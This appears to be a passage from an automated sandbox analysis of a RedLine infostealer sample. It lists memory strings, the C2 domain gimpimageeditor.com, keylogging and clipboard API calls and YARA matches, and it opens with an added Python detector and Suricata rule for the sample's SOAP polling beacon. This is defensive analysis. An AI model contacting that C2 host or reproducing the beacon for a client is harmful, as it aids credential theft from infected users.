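The POST requests above are SOAP 1.1 calls to the WCF operation tempuri.org/Endpoint/GetArguments on gimpimageeditor.com, repeated over a hundred times during the run: the sample polls its controller for commands. The following is an added example, not code from the report, the sandbox or the sample: it parses raw HTTP requests into method, target and headers, matches the beacon shape (POST to the site root, text/xml body, that exact SOAPAction) and counts hits per Host so repeated polling stands out. The sample traffic is constructed; the request body is the envelope a WCF basicHttpBinding client emits for a parameterless call, which is exactly 137 bytes and so matches the Content-Length in the report, but the page does not show the captured body itself. The Suricata rule string is illustrative and assumed, not taken from the report.

```python
import re
from collections import defaultdict

# The SOAPAction value seen in the report's POST requests.
SOAP_ACTION = "http://tempuri.org/Endpoint/GetArguments"

# Constructed body: what a WCF basicHttpBinding client sends for a parameterless
# GetArguments() call. It is 137 bytes, matching the report's Content-Length;
# the report itself does not show the body.
BEACON_BODY = (
    b'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>'
)


def make_request(method, target, host, headers, body=b""):
    """Build a raw CRLF-delimited HTTP/1.1 request, as a sensor would see it."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


BEACON_HEADERS = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": f'"{SOAP_ACTION}"',
    "Expect": "100-continue",
    "Accept-Encoding": "gzip, deflate",
}

# Constructed sample traffic: four beacons shaped like the report's, plus two
# benign requests (a different SOAP operation on an intranet host, and a GET).
SAMPLE_REQUESTS = [
    make_request("POST", "/", "gimpimageeditor.com", BEACON_HEADERS, BEACON_BODY)
    for _ in range(4)
] + [
    make_request("POST", "/svc.svc", "intranet.example", {
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": '"http://tempuri.org/IService/Ping"',
    }, b"<s:Envelope/>"),
    make_request("GET", "/index.html", "www.example.com", {"Accept": "*/*"}),
]


def parse_request(raw: bytes) -> dict:
    """Split a raw request into method, target, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def is_getarguments_beacon(req: dict) -> bool:
    """Match the report's C2 shape: SOAP 1.1 POST to '/' invoking GetArguments."""
    h = req["headers"]
    return (
        req["method"] == "POST"
        and req["target"] == "/"
        and h.get("content-type", "").lower().startswith("text/xml")
        and h.get("soapaction", "").strip('"') == SOAP_ACTION
    )


def beacon_hosts(raw_requests, min_hits=3):
    """Count matching requests per Host. Many identical POSTs to one host is the
    polling pattern the report shows (over a hundred hits to a single domain)."""
    counts = defaultdict(int)
    for raw in raw_requests:
        req = parse_request(raw)
        if is_getarguments_beacon(req):
            counts[req["headers"].get("host", "")] += 1
    return {host: n for host, n in counts.items() if n >= min_hits}


# Illustrative Suricata rule for the same header pattern. Assumed syntax, not
# from the report: validate with `suricata -T` before deploying.
SURICATA_RULE = (
    'alert http any any -> any any (msg:"SOAP GetArguments beacon (RedLine-style C2)"; '
    'flow:established,to_server; http.method; content:"POST"; '
    'http.header; content:"SOAPAction|3a 20 22|http://tempuri.org/Endpoint/GetArguments|22|"; '
    'classtype:trojan-activity; sid:1000001; rev:1;)'
)

if __name__ == "__main__":
    print(beacon_hosts(SAMPLE_REQUESTS))   # {'gimpimageeditor.com': 4}
```

Matching on the SOAPAction rather than on the domain survives the operator rotating C2 hosts, which is why the rule keys on the header. The request also carries Expect: 100-continue and Accept-Encoding but no User-Agent, which is consistent with the defaults of .NET's HttpWebRequest that WCF uses; that is a weaker signal on its own but useful when hunting for the same client talking to a domain not yet on a blocklist.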
Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gimpimageeditor.com
Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gimpimageeditor.com/
Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gimpimageeditor.com:80/
Source: RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gimpimageeditor.comH
Source: Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0t
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArguments
              Source: RegAsm.exe, 0000000A.00000002.3268386087.000000000276E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsH
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsResponse
              Source: RegAsm.exe, 0000000A.00000002.3268386087.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetArgumentsT
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyScanRequestResponse
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateLR
              Source: RegAsm.exe, 0000000A.00000002.3268386087.00000000026C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000002.2065078239.0000000000C99000.00000002.00000001.01000000.00000005.sdmp, Appartenga.exe.com, 00000008.00000002.2427249427.0000000000C99000.00000002.00000001.01000000.00000005.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
              Source: Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
              Source: Appartenga.exe.com, 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430475744.0000000004264000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2422606312.000000000427D000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000002.2430658930.000000000427D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: San.adt.0.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027905493.0000000000700000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com.4.dr, San.adt.0.drString found in binary or memory: https://www.globalsign.com/repository/06

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_004086AD SetWindowsHookExW 00000002,Function_0000867F,00000000,00000000 | 0_2_004086AD
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 6_2_00C44632
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C44830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 6_2_00C44830
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, | 6_2_00C44632
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, | 6_2_00C30508
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C5D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 6_2_00C5D164

              System Summary

              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C342D5: CreateFileW,DeviceIoControl,CloseHandle, | 6_2_00C342D5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 6_2_00C28F2E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C35778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 6_2_00C35778
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_00405782 | 0_2_00405782
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_0041302B | 0_2_0041302B
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_004128F0 | 0_2_004128F0
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_0040ADB0 | 0_2_0040ADB0
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_004132C3 | 0_2_004132C3
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_00412F51 | 0_2_00412F51
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BDB020 | 6_2_00BDB020
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BD94E0 | 6_2_00BD94E0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BD9C80 | 6_2_00BD9C80
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF23F5 | 6_2_00BF23F5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C58400 | 6_2_00C58400
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C06502 | 6_2_00C06502
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BDE6F0 | 6_2_00BDE6F0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C0265E | 6_2_00C0265E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF282A | 6_2_00BF282A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C089BF | 6_2_00C089BF
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C06A74 | 6_2_00C06A74
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C50A3A | 6_2_00C50A3A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C2EDB2 | 6_2_00C2EDB2
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BFCD51 | 6_2_00BFCD51
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C50EB7 | 6_2_00C50EB7
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C38E44 | 6_2_00C38E44
